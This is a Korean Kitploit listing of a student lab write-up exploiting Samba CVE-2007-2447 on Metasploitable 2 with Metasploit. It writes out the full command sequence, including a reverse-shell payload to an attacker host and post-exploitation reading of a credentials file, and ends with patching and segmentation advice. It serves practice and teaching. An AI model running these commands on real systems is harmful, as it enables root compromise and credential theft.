Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2 | Kitploit
도구/GitHubGitHub/devinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2
Privilege EscalationVulnerability AnalysisExploitationData ExfiltrationPost-ExploitationPenetration TestingCommand and ControlLearning & EducationLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubdevinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

저장소 보기
1년 전아직 검토되지 않음

SMB-PenTest: Metasploitable-2에서 CVE-2007-2447 악용

RedTeam-SMB-PenTest

linux bash

설명


이 프로젝트는 UMGC의 CMIT 386 과정의 일환으로 수행한 침투 테스트 작업을 기록합니다. Kali Linux 공격 VM에서 Metasploit을 사용하여 Metasploitable 2의 Samba SMB usermap_script 취약점(CVE-2007-2447)을 악용하는 데 초점을 맞춥니다. 이 개념 증명은 레거시 취약점이 전체 시스템 장악, 자격 증명 탈취 및 데이터 유출로 이어질 수 있는 방법을 보여줍니다.

취약점 개요

이 취약점은 445 포트의 Samba 서비스에 존재하며, username map 스크립트의 부적절한 입력 처리를 통해 인증되지 않은 원격 명령 실행이 가능합니다. 악용될 경우 공격자에게 루트 권한 셸 접근을 제공합니다.

환경

따라야 할 단계

1. Metasploit 실행:

root@kitploit:~
msfconsole


공격자 호스트와 피해자 머신이 모두 부팅되어 실행 중인지 확인하십시오.

2. 익스플로잇 검색:

root@kitploit:~
search samba

3. 적절한 모듈 사용:

root@kitploit:~
use exploit/multi/samba/usermap_script

4. 필요한 옵션 설정:

root@kitploit:~
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse

5. 익스플로잇 실행:

root@kitploit:~
exploit

6. 사후 침투 명령:

root@kitploit:~
whoami
hostname
cd /redteam7/student3
cat mypass.txt

재설정 지침

세션이 멈추거나 끊기면:

Metasploit 재설정:

root@kitploit:~
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K             
jobs -K
# Restart Metasploit
msfconsole              

주요 시사점

  • Samba 3.0.20과 같은 usermap_script를 사용하는 레거시 서비스는 매우 취약합니다.
  • 이 SMB 취약점을 악용하면 루트 셸 접근 권한을 얻을 수 있습니다.
  • 간단한 명령으로 중요한 데이터를 탈취할 수 있어 실제 위험을 입증합니다.
  • 이는 패치 적용, 네트워크 분리, 서비스 노출 최소화의 필요성을 증명합니다.

권장 사항

  • 레거시 시스템을 즉시 패치하거나 폐기하십시오.
  • 엄격한 네트워크 분리와 방화벽 규칙을 구현하십시오.
  • SMB 노출을 내부 인증 사용자로만 제한하십시오.
  • 의심스러운 활동과 측면 이동을 위해 로그를 모니터링하십시오.

참고 자료

  • Metasploit Samba usermap_script
  • CVE-2007-2447 세부 정보
  • Metasploitable 2 익스플로잇 인덱스
도구 다운로드
구성 요소세부 정보
공격자 VMKali Linux
피해자 VMMetasploitable 2
대상 포트445 (Samba/SMB)
사용된 익스플로잇exploit/multi/samba/usermap_script
자격 증명 대상/redteam7/student3/mypass.txt